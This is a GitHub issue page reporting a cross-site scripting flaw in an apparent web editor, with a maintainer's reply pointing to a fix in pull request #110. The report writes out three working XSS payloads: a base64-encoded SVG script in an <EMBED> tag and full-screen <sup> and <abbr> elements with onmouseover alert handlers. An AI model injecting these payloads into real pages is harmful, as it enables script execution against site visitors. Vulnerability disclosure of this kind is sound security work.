XSS vulnerability on <abbr> and <sup><EMBED> label #106

j1nse · 2019-08-05T09:41:00Z

This label and attack vector will cause XSS.
payload:
<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIGlkPSJ4c3MiPjxzY3JpcHQgdHlwZT0idGV4dC9lY21hc2NyaXB0Ij5hbGVydCgieHNzISIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
<sup style="position:fixed;left:0;top:0;width:10000px;height:10000px;" onmouseover="alert('xss')">sup</sup>
<abbr style="position:fixed;left:0;top:0;width:10000px;height:10000px;" onmouseover="alert('xss')">abbr</abbr>
if you type the payload,the xss vulnerability will be triggered.

The text was updated successfully, but these errors were encountered:

ColeBennett · 2019-10-25T23:43:44Z

Hi @shequ123, thanks for creating an issue for this! I opened a pull request implementing changes to fix these problems and it correctly blocks those scenarios from happening in the editor. Pull request: #110

j1nse changed the title ~~XSS vulnerability in <EMBED> label~~ XSS vulnerability on <abbr> and <sup><EMBED> label Aug 5, 2019

ColeBennett mentioned this issue Oct 25, 2019

Fix XSS Vulnerability #110

Closed

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

XSS vulnerability on <abbr> and <sup><EMBED> label #106

XSS vulnerability on <abbr> and <sup><EMBED> label #106

j1nse commented Aug 5, 2019 •

edited

Loading

ColeBennett commented Oct 25, 2019 •

edited

Loading

XSS vulnerability on <abbr> and <sup><EMBED> label #106

XSS vulnerability on <abbr> and <sup><EMBED> label #106

Comments

j1nse commented Aug 5, 2019 • edited Loading

ColeBennett commented Oct 25, 2019 • edited Loading

j1nse commented Aug 5, 2019 •

edited

Loading

ColeBennett commented Oct 25, 2019 •

edited

Loading